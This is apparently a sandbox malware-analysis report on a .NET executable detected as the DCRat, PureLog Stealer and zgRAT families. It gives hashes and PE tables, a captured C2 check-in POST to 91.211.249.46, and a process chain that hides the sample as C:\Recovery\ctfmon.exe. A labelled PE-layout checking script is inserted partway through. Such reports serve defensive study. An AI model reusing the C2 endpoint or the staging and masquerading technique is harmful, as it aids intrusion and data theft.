                                                  Entropy (8bit):5.4346552043530165
                                                  Encrypted:false
                                                  SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                  MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                  SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                  SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                  SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 6%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Windows\System32\PING.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):502
                                                  Entropy (8bit):4.6179633833572735
                                                  Encrypted:false
                                                  SSDEEP:12:PBa5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:ZUdUOAokItULVDv
                                                  MD5:4D6227259BB03B08E330E280821125D2
                                                  SHA1:3704E26F097D1C3A587ABCB4DD69F7E2DC0C3923
                                                  SHA-256:A4DB479BD0F72E05ECAB2D8B08D8F3505A034753BCEEAA13CC803E4B4AF19FA8
                                                  SHA-512:DE01ECF11A8289F2740EFEDFF94B18619F93E7408A1CBAB0EE97C59655CBC492F9033D9A8CB9961669DCE5BCD890F8CD275C7DD9DF7F9848115F140B7314F5A8
                                                  Malicious:false
Preview:
Pinging 367706 [::1] with 32 bytes of data:
Reply from ::1: time<1ms
Reply from ::1: time<1ms
Reply from ::1: time<1ms
Reply from ::1: time<1ms
Reply from ::1: time<1ms
Reply from ::1: time<1ms
Reply from ::1: time<1ms
Reply from ::1: time<1ms
Reply from ::1: time<1ms
Reply from ::1: time<1ms
Ping statistics for ::1:
    Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.193302330489937
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:85D5ktqjpd.exe
                                                  File size:4'515'328 bytes
                                                  MD5:97c2927135dd8fce7d56d5e1b2914bfa
                                                  SHA1:a6b5eb9800ea4fef6da44d306d743941143d87ea
                                                  SHA256:21922a6cc19a72509d69fb830853a1e7e3af5b3e44134da7d1b65c3ee78f6037
                                                  SHA512:78c5f18762a688557eb4994e6685481b3883e6c0dcc27c7abb05b7fe524bed24e949ef5ae2b91b9da6332b26d14b1ab1abd35961235d2d4ee6b8663e0849fe87
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  TLSH:8B26F14E57664E73C2D43F3488D7042D82B6F2267522EF2B365F24D9B9462328B166F3
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@................................
                                                  Icon Hash:90cececece8e8eb0
                                                  Entrypoint:0x7b9d0e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (this line repeats 97 times in the listing: the disassembler ran past the 6-byte stub into zero padding, and 00 00 decodes as add byte ptr [eax], al)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3b9cc0         0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3ba000         0x370         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x3bc000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity  File Type  Entropy              Characteristics
.text   0x2000           0x3b7d14      0x3b7e00  ea5083b2726cd9f8c2c5d91d929f510c  unknown   unknown          unknown    unknown              IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x3ba000         0x370         0x400     2cf46166977c39af7fde4d8438eccbc8  False     0.3779296875     data       2.867353130536527    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x3bc000         0xc           0x200     2148754c9e04bdd83ec5967ea69712b7  False     0.044921875      data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name        RVA       Size   Type  Language  Country  ZLIB Complexity
RT_VERSION  0x3ba058  0x318  data                     0.44823232323232326
DLL          Import
mscoree.dll  _CorExeMain
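The header, data-directory and section values above have the usual shape of a managed (.NET) executable: the native entry point is a 6-byte jmp through the single IAT slot that the import table binds to mscoree!_CorExeMain, and the CLR header lives in the COM_DESCRIPTOR directory immediately after the IAT. The script below is an added example, not part of the Joe Sandbox report: it puts the report's numbers for 85D5ktqjpd.exe into a small model and checks those relationships. Nothing is read from disk, and the check names and the "writable .rsrc" heuristic are the example's own.

```python
"""Layout checks for the PE header values the report lists above.

Added example, not part of the Joe Sandbox report.  Every constant below is
copied from the report's header, data-directory and section tables for
85D5ktqjpd.exe; nothing is read from disk, and the check names are this
example's own.  ENTRY_STUB is the encoding of the one instruction shown at the
entry point, "jmp dword ptr [00402000h]" (FF 25 + absolute pointer address).
"""
from typing import Dict, List, Optional, Set, Tuple

IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0x7B9D0E          # "Entrypoint" row (absolute, imagebase included)

# name, virtual address (RVA), virtual size, characteristics
SECTIONS: List[Tuple[str, int, int, Set[str]]] = [
    (".text",  0x002000, 0x3B7D14, {"CNT_CODE", "MEM_EXECUTE", "MEM_READ"}),
    (".rsrc",  0x3BA000, 0x000370, {"CNT_INITIALIZED_DATA", "MEM_READ", "MEM_WRITE"}),
    (".reloc", 0x3BC000, 0x00000C, {"CNT_INITIALIZED_DATA", "MEM_DISCARDABLE", "MEM_READ"}),
]

# populated data directories: RVA, size
DATA_DIRS: Dict[str, Tuple[int, int]] = {
    "IMPORT":         (0x3B9CC0, 0x4B),
    "RESOURCE":       (0x3BA000, 0x370),
    "BASERELOC":      (0x3BC000, 0xC),
    "IAT":            (0x002000, 0x8),     # one slot + null terminator
    "COM_DESCRIPTOR": (0x002008, 0x48),    # CLR header (72 bytes): managed image
}

DLL_CHARACTERISTICS = {"DYNAMIC_BASE", "NX_COMPAT", "NO_SEH", "TERMINAL_SERVER_AWARE"}

ENTRY_STUB = bytes.fromhex("FF 25 00 20 40 00")   # jmp dword ptr [0x00402000]


def rva_to_section(rva: int) -> Optional[str]:
    """Name of the section whose virtual range contains rva, or None (headers/gap)."""
    for name, va, vsize, _ in SECTIONS:
        if va <= rva < va + vsize:
            return name
    return None


def jmp_indirect_target(stub: bytes) -> int:
    """Decode FF 25 disp32; in a 32-bit image disp32 is the absolute pointer address."""
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        raise ValueError("not an indirect jmp")
    return int.from_bytes(stub[2:6], "little")


def in_dir(rva: int, name: str) -> bool:
    """True if rva falls inside the named data directory."""
    start, size = DATA_DIRS[name]
    return start <= rva < start + size


def analyse() -> Dict[str, object]:
    """Relationships between entry point, IAT, CLR header and sections."""
    ep_rva = ENTRY_POINT_VA - IMAGE_BASE
    text_va, text_vsize = SECTIONS[0][1], SECTIONS[0][2]
    ptr_rva = jmp_indirect_target(ENTRY_STUB) - IMAGE_BASE
    return {
        "entry_rva": ep_rva,
        "entry_section": rva_to_section(ep_rva),
        # the linker appends the 6-byte native stub as the last bytes of .text
        "stub_is_last_6_bytes_of_text": ep_rva + len(ENTRY_STUB) == text_va + text_vsize,
        # the stub jumps through the IAT slot bound to mscoree!_CorExeMain
        "stub_jumps_through_iat": in_dir(ptr_rva, "IAT"),
        "managed": DATA_DIRS["COM_DESCRIPTOR"][1] > 0,
        "aslr_and_nx": {"DYNAMIC_BASE", "NX_COMPAT"} <= DLL_CHARACTERISTICS,
        # writable+executable sections would be a red flag; none expected here
        "wx_sections": [n for n, _, _, ch in SECTIONS if {"MEM_EXECUTE", "MEM_WRITE"} <= ch],
        # compiler-emitted .rsrc is normally read-only; a writable one is worth a look
        "writable_rsrc": "MEM_WRITE" in SECTIONS[1][3],
        "dirs_by_section": {d: rva_to_section(rva) for d, (rva, _) in DATA_DIRS.items()},
    }


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key:30} {value}")
```

Note that every populated directory except RESOURCE and BASERELOC resolves into .text, as it should for a managed image: the metadata, method bodies, import table and IAT are all part of the single code section.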
Timestamp                        SID      Signature                                             Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
2025-01-12T09:17:22.415092+0100  2048095  ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)  1         192.168.2.4  49731        91.211.249.46  80         TCP
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Jan 12, 2025 09:17:21.751955986 CET  49731        80         192.168.2.4    91.211.249.46
Jan 12, 2025 09:17:21.756731987 CET  80           49731      91.211.249.46  192.168.2.4
Jan 12, 2025 09:17:21.756877899 CET  49731        80         192.168.2.4    91.211.249.46
Jan 12, 2025 09:17:21.757888079 CET  49731        80         192.168.2.4    91.211.249.46
Jan 12, 2025 09:17:21.762644053 CET  80           49731      91.211.249.46  192.168.2.4
Jan 12, 2025 09:17:22.103302956 CET  49731        80         192.168.2.4    91.211.249.46
Jan 12, 2025 09:17:22.109235048 CET  80           49731      91.211.249.46  192.168.2.4
Jan 12, 2025 09:17:22.362692118 CET  80           49731      91.211.249.46  192.168.2.4
Jan 12, 2025 09:17:22.415091991 CET  49731        80         192.168.2.4    91.211.249.46
Jan 12, 2025 09:18:37.364954948 CET  80           49731      91.211.249.46  192.168.2.4
Jan 12, 2025 09:18:37.365201950 CET  49731        80         192.168.2.4    91.211.249.46
Jan 12, 2025 09:19:02.385298014 CET  49731        80         192.168.2.4    91.211.249.46
Jan 12, 2025 09:19:02.390564919 CET  80           49731      91.211.249.46  192.168.2.4
                                                  • 91.211.249.46
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44973191.211.249.46803384C:\Recovery\ctfmon.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 12, 2025 09:17:21.757888079 CET363OUTPOST /3vmApi/8/poll2GeneratorPython/ImagepipeRequestsecureprocesswpPublic.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                  Host: 91.211.249.46
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Jan 12, 2025 09:17:22.103302956 CET344OUTData Raw: 05 02 04 06 03 0c 01 05 05 06 02 01 02 0c 01 03 00 0b 05 09 02 00 03 09 00 54 0f 54 04 03 01 06 0f 01 04 0d 01 05 03 06 0e 0a 05 00 07 51 07 02 06 06 0b 09 0c 0f 04 06 05 04 05 02 05 04 06 09 01 02 0d 5e 07 03 05 06 0d 57 0c 57 0c 04 0e 04 02 07
                                                  Data Ascii: TTQ^WWURTU\L~|pXtaBaK|hob^tkXkZ[o`_o`P}^NwtpA~u~V@x}PN~ru
                                                  Jan 12, 2025 09:17:22.362692118 CET696INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Sun, 12 Jan 2025 08:17:22 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 548
                                                  Connection: keep-alive
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Target ID:0
                                                  Start time:03:17:04
                                                  Start date:12/01/2025
                                                  Path:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\85D5ktqjpd.exe"
                                                  Imagebase:0xd70000
                                                  File size:4'515'328 bytes
                                                  MD5 hash:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1688303891.0000000000D72000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1741623674.00000000137A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:03:17:08
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat"
                                                  Imagebase:0x7ff78c4b0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:03:17:08
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:03:17:09
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff6c78a0000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:03:17:09
                                                  Start date:12/01/2025
                                                  Path:C:\Windows\System32\PING.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:ping -n 10 localhost
                                                  Imagebase:0x7ff774ce0000
                                                  File size:22'528 bytes
                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:03:17:18
                                                  Start date:12/01/2025
                                                  Path:C:\Recovery\ctfmon.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Recovery\ctfmon.exe"
                                                  Imagebase:0xa00000
                                                  File size:4'515'328 bytes
                                                  MD5 hash:97C2927135DD8FCE7D56D5E1B2914BFA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ctfmon.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 83%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false


                                                    Execution Graph

                                                    Execution Coverage:5.9%
                                                    Dynamic/Decrypted Code Coverage:81.2%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:16
                                                    Total number of Limit Nodes:0

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1757752640.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1757752640.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1757752640.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b8b0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: N^H
                                                    • API String ID: 0-4206628934

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: [^H
                                                    • API String ID: 0-2846327662

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: ced87bd6abc6569fcd008acc0ea84e680eebebc947ea67aef034eb596abf6424
                                                    • Instruction ID: acaf91cbf20d0180092bfe3a47700c8ced3fce0e9e37050548ad0bd92998e90a
                                                    • Opcode Fuzzy Hash: ced87bd6abc6569fcd008acc0ea84e680eebebc947ea67aef034eb596abf6424
                                                    • Instruction Fuzzy Hash: 3B514C71E0966E9FDB69DF98C8605BDB7B1FF44300F1141BAD11EE72A6CA396A01CB40

                                                    Control-flow Graph

                                                    Control-flow graph (rendered as an image on the original page with an executed / not-executed block legend): function entry at 7ffd9ba701b9, 5 basic blocks:
                                                    • 7ffd9ba701b9-7ffd9ba701c5 (entry) -> 7ffd9ba701d0 or 7ffd9ba701c7
                                                    • 7ffd9ba701c7-7ffd9ba701cf -> 7ffd9ba701d0
                                                    • 7ffd9ba701d0-7ffd9ba702a2 (calls CloseHandle) -> 7ffd9ba702a4 or 7ffd9ba702aa
                                                    • 7ffd9ba702a4 -> 7ffd9ba702aa
                                                    • 7ffd9ba702aa-7ffd9ba702fe (no outgoing edge; function exit)
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1762359474.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9ba60000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 937019d561487733ba1da9f56edcb532b05017b973acdcf01a635cc7853c9428
                                                    • Instruction ID: 442322f6b88986bcfe088e5017ffa393a8f717db5e9e3a42a071ed6a2b5bc03e
                                                    • Opcode Fuzzy Hash: 937019d561487733ba1da9f56edcb532b05017b973acdcf01a635cc7853c9428
                                                    • Instruction Fuzzy Hash: CC416C70D0864C8FDB59DFA8D894BEDBBF0EF56310F1041AAD449E7292DA749885CB41

                                                    Control-flow Graph

                                                    Control-flow graph (rendered as an image on the original page with an executed / not-executed block legend; edge list not reproduced): function entry block 7ffd9bfb39aa-7ffd9bfb39b8, 48 basic blocks spanning 7ffd9bfb39a4-7ffd9bfb3ec3; the only call is to 7ffd9bff5658 from block 7ffd9bfb3ddc-7ffd9bfb3ec3, and no Windows API name is resolved for it.
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6c5731bfa7f6add143c5f688a73592355396a09b99948c2213f12d0c28596c3
                                                    • Instruction ID: 2d8d82e0b90b53289872647eacbaee5dd89676c859c912d1e0a67ad2eee8bf41
                                                    • Opcode Fuzzy Hash: c6c5731bfa7f6add143c5f688a73592355396a09b99948c2213f12d0c28596c3
                                                    • Instruction Fuzzy Hash: B802F47061966A8FEB59CF58C4E06B477A1FF44300F5142BEC84ECB69ACA39F985CB41

                                                    Control-flow Graph

                                                    Control-flow graph (rendered as an image on the original page with an executed / not-executed block legend; edge list not reproduced): function entry block 7ffd9bfb49d0-7ffd9bfb49de, 51 basic blocks spanning 7ffd9bfb499a-7ffd9bfb4e01; internal calls to 7ffd9bfb43a0 (two call sites), 7ffd9bfb2eb0 (two call sites), 7ffd9bfb2fe0 (two call sites) and 7ffd9bfb15f0 (one call site, block 7ffd9bfb4db1-7ffd9bfb4e01); no Windows API names are resolved for any of them.
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec829c2e9794ae44958624a1f1d9e9302ed8fe03b37602de85ea64993f8c1b9e
                                                    • Instruction ID: 22c26374f50754a87d17ce05cfc94931539608d0f2fd26d42344e1f6982424ee
                                                    • Opcode Fuzzy Hash: ec829c2e9794ae44958624a1f1d9e9302ed8fe03b37602de85ea64993f8c1b9e
                                                    • Instruction Fuzzy Hash: 15E1E330B0EB6A8FE378CF58D5A057577E0FF44300B15467EC58EC76A6DA2AB9428B41
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 413402bb9c50bac84cafc619903e82c4fca93b9b93ab493945064d96e58273bc
                                                    • Instruction ID: 731f6d8b3d6b2bfa9ca7dc59515c48e5a8fb10cd908d33aaa0fe4dcdf2a07fb9
                                                    • Opcode Fuzzy Hash: 413402bb9c50bac84cafc619903e82c4fca93b9b93ab493945064d96e58273bc
                                                    • Instruction Fuzzy Hash: 0851B632A0E7AE9FD756ABB8A8644E87BB0EF05314F0501BBD04DC71E3DE296905C751
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9bfb0000_85D5ktqjpd.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be56de8cd0bc996d070847b14a53dbfecadc4cfc037ea5e6da3253418c0a1764
                                                    • Instruction ID: 02bdcd01b1ab015358ca47146de2fad86746bb7a548695a3358fbb8ca25266a1
                                                    • Opcode Fuzzy Hash: be56de8cd0bc996d070847b14a53dbfecadc4cfc037ea5e6da3253418c0a1764
                                                    • Instruction Fuzzy Hash: BAD1D330A0D92D8FEBB8DE48C8A5AA573E1FF54311F5102B9D11DD72A2DE29AD45CF80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1768071511.00007FFD9BFB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFB0000, based on PE: false
